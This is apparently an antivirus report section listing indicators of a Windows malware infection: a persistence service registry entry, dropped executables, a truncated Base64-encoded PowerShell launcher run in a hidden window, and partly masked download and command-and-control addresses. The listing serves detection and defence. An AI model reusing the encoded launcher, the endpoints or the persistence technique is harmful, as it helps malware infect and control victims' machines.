Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\ndfhcdiscovery] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\ndfhcdiscovery] 'ImagePath' = '"%WINDIR%\SysWOW64\ole32\ndfhcdiscovery.exe"'
- 'ndfhcdiscovery' "%WINDIR%\SysWOW64\ole32\ndfhcdiscovery.exe"
- 'ndfhcdiscovery' %WINDIR%\SysWOW64\ole32\ndfhcdiscovery.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABDAGgAMABuAHQANABvAD0AKAAnAFcAJwArACgAJwAyAHkAaQAnACsAJwB4AHIAcQAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUAbgB2ADoAdQBzAGUAcgBQAFIATwBmAEkATABlAFwAaA...
- %HOMEPATH%\huhmf81\z1vnbqg\zstpguu.exe
- %WINDIR%\syswow64\ole32\ndfhcdiscovery.exe
- %HOMEPATH%\huhmf81\z1vnbqg\zstpguu.exe в %WINDIR%\syswow64\ole32\ndfhcdiscovery.exe
- '49.##3.9.118':80
- http://kh##y.com/fShpe/ep1l5U/
- http://49.##3.9.118/wHHyZqgv9PY/WKToPp0WcBHJyM/vt9WpTE4IPyhyFp4uN/wyM2rWMCnukWk/
- DNS ASK kh##y.com
- '%HOMEPATH%\huhmf81\z1vnbqg\zstpguu.exe'
- '%WINDIR%\syswow64\ole32\ndfhcdiscovery.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABDAGgAMABuAHQANABvAD0AKAAnAFcAJwArACgAJwAyAHkAaQAnACsAJwB4AHIAcQAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUAbgB2ADoAdQBzAGUAcgBQAFIATwBmAEkATABlAFwAaA...' (со скрытым окном)